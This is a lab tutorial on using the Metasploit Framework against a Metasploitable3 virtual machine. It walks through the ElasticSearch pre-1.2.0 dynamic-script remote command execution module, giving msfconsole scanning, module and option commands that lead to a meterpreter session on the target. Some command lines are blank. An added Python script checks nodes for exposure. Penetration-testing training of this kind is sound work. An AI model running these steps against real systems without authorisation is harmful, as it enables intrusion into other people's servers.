Metasploit Framework MSF

From Embedded Lab Vienna for IoT & Security


Metasploit Framework (MSF) is a tool for detecting security vulnerabilities in an IT network infrastructure, an activity called penetration testing. Penetration testing is often referred to as "ethical hacking". The aim of the penetration tester is to analyse a specific target or a whole network domain. The tool provides an Application Programming Interface (API) that lets security developers modify or create new vulnerability modules within the framework.

A penetration test proceeds in several stages to get the best results. First, the requirements are specified together with the customer, that is, which devices in the target domain are to be attacked. Next, information (intelligence) gathering collects enough details about the target to detect an unprotected weak point. When one or more weak points are detected, the penetration tester works out how to gain access to the systems. Once the method of gaining access has been determined, the exploit can be performed. If access is gained, post-exploitation follows to gather important data in the critical network domain.


  • Operating system: Linux, e.g. Kali Linux or Ubuntu 18.04
  • Packages: msfconsole postgresql git nmap virtualbox

In order to complete these steps, you must have followed the Metasploit Framework, Metasploitable3, and PostgreSQL or MySQL installation documentation beforehand.

Description of exploit

This is a short step-by-step guide to running an exploit against Windows Server 2008 in a virtual machine. As the target we chose the application ElasticSearch in a version prior to 1.2.0, which is already installed in the Metasploitable3 virtual machine from Rapid7.

The module multi/elasticsearch/script_mvel_rce exploits a Remote Command Execution (RCE) vulnerability in ElasticSearch. The REST API allows dynamic script execution without authentication, so a remote attacker is able to execute arbitrary Java code on the target system.
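As an added example (not part of this page, of Metasploit or of ElasticSearch), the following Python script evaluates the condition the module relies on from a node's own configuration, so an operator can verify their ElasticSearch nodes before or after a test. It assumes the response layout of GET /_nodes/settings (per-node "version" and "settings") and the ElasticSearch 1.x option name script.disable_dynamic; the sample responses are constructed.

```python
"""Exposure check for the ElasticSearch dynamic-scripting RCE described above.
Added example, not part of the original page or of Metasploit. It assumes the
layout of a GET /_nodes/settings response (per-node "version" and "settings")
and the ES 1.x option name script.disable_dynamic; sample data is constructed."""
import json

FIXED_VERSION = (1, 2, 0)  # from 1.2.0 dynamic scripting is off by default


def parse_version(version):
    """Turn '1.1.1' into (1, 1, 1); a '-beta1' style suffix is ignored."""
    return tuple(int(part) for part in version.split("-")[0].split("."))


def dynamic_scripting_enabled(version, settings):
    """True when the node accepts dynamic scripts via the REST API.
    The option may be flat ('script.disable_dynamic') or nested under
    'script'; when absent, the default depends on the version."""
    value = settings.get("script.disable_dynamic")
    if value is None:
        value = settings.get("script", {}).get("disable_dynamic")
    if value is None:
        return parse_version(version) < FIXED_VERSION
    return str(value).lower() != "true"


def assess(nodes_response):
    """Per node id: version, whether dynamic scripts are on, and whether the
    unauthenticated script RCE (pre-1.2.0 with dynamic scripts) is reachable."""
    findings = {}
    for node_id, node in nodes_response["nodes"].items():
        version = node["version"]
        enabled = dynamic_scripting_enabled(version, node.get("settings", {}))
        findings[node_id] = {
            "version": version,
            "dynamic_scripting": enabled,
            "vulnerable": parse_version(version) < FIXED_VERSION and enabled,
        }
    return findings


# Constructed sample: an unpatched default node, a hardened unpatched node,
# and a patched node that re-enabled dynamic scripting.
SAMPLE_NODES = json.loads("""{"nodes": {
  "n1": {"version": "1.1.1", "settings": {}},
  "n2": {"version": "1.1.1", "settings": {"script.disable_dynamic": "true"}},
  "n3": {"version": "1.2.0", "settings": {"script": {"disable_dynamic": "false"}}}
}}""")

if __name__ == "__main__":
    for node_id, finding in assess(SAMPLE_NODES).items():
        print(node_id, finding)
```

Node n3 shows why both flags are reported: a patched node with dynamic scripting turned back on is outside this module's scope but still worth a hardening finding.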

Step 1: open msf tool

Enter the command in the shell to open the terminal of the framework:



Step 2: nmap scan

Enter the command in the shell to detect the open ports of your virtual machine:

db_nmap -Pn


This command saves the scan results directly to the database you have configured. Enter the command in the shell to check the saved results:



Step 3: search module

Enter the command in the shell to search for an exploit module named elastic:

search elastic


Step 4: use module

Enter the command in the shell to use an exploit module:

use exploit/multi/elasticsearch/script_mvel_rce


Enter the command in the shell to check the usage of the module:



Step 5: show module options

Enter the command in the shell to show the module options:

show options


Step 6: set module options

Enter the command in the shell to set the options:

set rhosts
set verbose true
set lhost
set rport 9200


Check your settings again with the command:

show options


Step 7: vulnerability and exploit

Enter the command in the shell to check the vulnerability of the system:



Enter the command in the shell to exploit:



A meterpreter session should now open so that post-exploitation can be performed. If this does not work, check your firewall configuration.

Step 8: meterpreter shell

Enter the command in the shell to open the command line interface (CLI) of the target host:



Enter the command in the shell to check where the xxx.jar file was placed:

DIR /s C:\WINDOWS\TEMP\xxx.jar


Used Hardware